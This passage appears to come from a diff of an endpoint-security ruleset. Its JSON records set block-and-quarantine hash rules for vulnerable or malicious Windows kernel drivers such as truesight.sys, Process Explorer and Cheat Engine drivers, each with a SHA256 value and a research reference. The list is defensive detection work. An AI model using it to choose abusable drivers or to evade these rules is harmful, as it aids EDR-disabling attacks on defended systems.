"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619733Z", + "creation_date": "2026-03-23T11:45:29.619735Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619740Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9c60f560440ff16ad3c767ff5b7658d5bda61ea1166efe9b7f450447557136e", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd78fe86-180b-54d3-b29d-86852105f255", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152468Z", + "creation_date": "2026-03-23T11:45:31.152471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa8ef041d0fb7efdd210f1dc6da700c60d50b409e35487d7eb424ce333eb9eb4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd9ab9b7-498b-5ced-b001-98f3704ae3bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605322Z", + "creation_date": "2026-03-23T11:45:29.605324Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605330Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c52fdfb39d93de37a489e8899d01ef665d350d59c8b444eb88a9258bca7ec18", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bd9e6959-642d-5ef9-87d2-a210100da481", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472467Z", + "creation_date": "2026-03-23T11:45:31.472471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d40656cff5214074ff468ec3b57c6f25dcf90d39cdf242349dddd76cb27de1ae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bda89e75-e6fb-5adf-920a-1352f52c4fed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815974Z", + "creation_date": "2026-03-23T11:45:30.815976Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815982Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "52478f3ddd3d0b9eb098e66049d132cc5c7e05720bfc78b6550ce5a40306d993", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bda8cb6a-1d3b-50d6-8417-f6b3b90cd8b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976964Z", + "creation_date": "2026-03-23T11:45:29.976966Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976972Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "2107b1c150e9c60630d4306fdcd8d47dd8918e912210066ef5fa551b30a6eb1c", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bdacc102-ebf3-5b24-9bf8-49c1ce8dd07b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621016Z", + "creation_date": "2026-03-23T11:45:29.621018Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621024Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bc0cec99dce687304dad8f7a6daf772e695cbd0169d346d03ae12500361a1e8", + "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bdc44806-78c8-58a1-817e-e82e03a57593", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480117Z", + "creation_date": "2026-03-23T11:45:30.480119Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480124Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b78eb7f12ba718183313cf336655996756411b7dcc8648157aaa4c891ca9dbee", + "comment": "Vulnerable Kernel Driver (aka IoAccesssys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bdc77bc7-804d-5546-9ada-4968629588e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151143Z", + "creation_date": "2026-03-23T11:45:31.151145Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151150Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a0c8585a071d0a69c1db2c3817a7ebed2b3172620927673d43f4de5ae7fee1b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bdcc8ce2-a136-59fb-babd-ae32ca35154d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985045Z", + "creation_date": "2026-03-23T11:45:29.985047Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985053Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c786f3ca229da18b2806af4d57ecad603859ee548549b19f71a623f477fc740e", + "comment": "Dangerous Physmem Kernel Driver (aka Dh_Kernel.Sys) [https://www.loldrivers.io/drivers/dfce8b0f-d857-4808-80ef-61273c7a4183/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bdd2dd2a-b577-532c-9470-3c79ec661c51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815178Z", + "creation_date": "2026-03-23T11:45:31.815180Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86fca8a2417289f6e57e965b57c77afc25a2e0238f7b15fa6749e36ccc8333ed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bde7dd90-5d3b-5561-b0ac-8a365b8d330c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827769Z", + "creation_date": "2026-03-23T11:45:30.827771Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827776Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81f31698797fd3e2be5c0122331c42df3158f40dcbd9badf42078371deceab13", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"bdf0da74-9213-5a2d-a5cf-3f5b77847594", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819516Z", + "creation_date": "2026-03-23T11:45:31.819520Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819528Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9318ed6cf1c407c5766755322df3d11e268be558c1446c8b75d0e4da2ed05e08", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bdf23a90-d655-5493-ab5e-d083098e8b56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825633Z", + "creation_date": "2026-03-23T11:45:30.825635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.825641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1293155f307ac61973d7f0d05e7e22df5ee14d23ca9b63556f836186be8145a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bdf38bea-f5f7-5f5a-8ab5-d20864bcd9cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617712Z", + "creation_date": "2026-03-23T11:45:29.617714Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617719Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "626fae47811450d080d08c3d9fd890aa64bfecdc45eacd42a40850c1833c8763", + "comment": "Cheat Engine dangerous driver (aka dbk64.sys) [https://www.loldrivers.io/drivers/1524a54d-520d-4fa4-a7d5-aaaa066fbfc4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bdf42d1c-5ee2-529e-a411-0d07752d8d62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819354Z", + "creation_date": "2026-03-23T11:45:31.819356Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3cd55592a03556e29d89dbf5e3cc6db5e0aaab74ccba59cc467131843c01ea76", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be330886-88d8-587d-a166-2fba15218648", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457929Z", + "creation_date": "2026-03-23T11:45:30.457933Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457941Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "202d9703a5b8d06c5f92d2c5218a93431aa55af389007826a9bfaaf900812213", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be3531ac-e090-5a60-9200-ee929127bb23", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975552Z", + "creation_date": "2026-03-23T11:45:29.975554Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975559Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b50ffc60eaa4fb7429fdbb67c0aba0c7085f5129564d0a113fec231c5f8ff62e", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be62872f-9a8b-5c95-8aaf-6263eea69ab2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 
1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825441Z", + "creation_date": "2026-03-23T11:45:31.825443Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825448Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b864ffab5fb7c53696543377bc03efc301c2ae33ff0314e2a2bf437f3c66faa6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be66222a-d7ab-543b-9ae7-038aba3f66cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967658Z", + "creation_date": "2026-03-23T11:45:29.967660Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967665Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34954e34f958648557a2cab18491f900183a1ef516949d681c20e11920a3117f", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) 
[https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be788b55-4e26-5d69-9526-d5dd88b97f08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474713Z", + "creation_date": "2026-03-23T11:45:31.474718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474728Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fdc8ffee7073f1bcc9ebf768897a57b74a27011be1112420e09a0841eeba9530", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be7967db-75e9-57bb-aae7-a36f208017d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606540Z", + 
"creation_date": "2026-03-23T11:45:29.606542Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c286dfac5ca413efeb1936e876688b6bd46d25dc64206f86efb4f52ad83d1889", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be846ef1-c5a5-5306-bb6f-4755a93c3a65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822727Z", + "creation_date": "2026-03-23T11:45:30.822730Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822735Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6d91487921478891e5570663f23a473b1b0490f8cf75bdeb7ab00111999fb9b", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be8d3d00-f0ab-57b3-aa0b-4ba1c318f131", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813322Z", + "creation_date": "2026-03-23T11:45:31.813325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813333Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6fdd4baacdf0ab03ed12749d84e32423ea25dadc0e1a8c7d79f44397bc09951", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "be966eb6-bec3-53c3-bb70-c88309e979e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604825Z", + "creation_date": "2026-03-23T11:45:29.604827Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
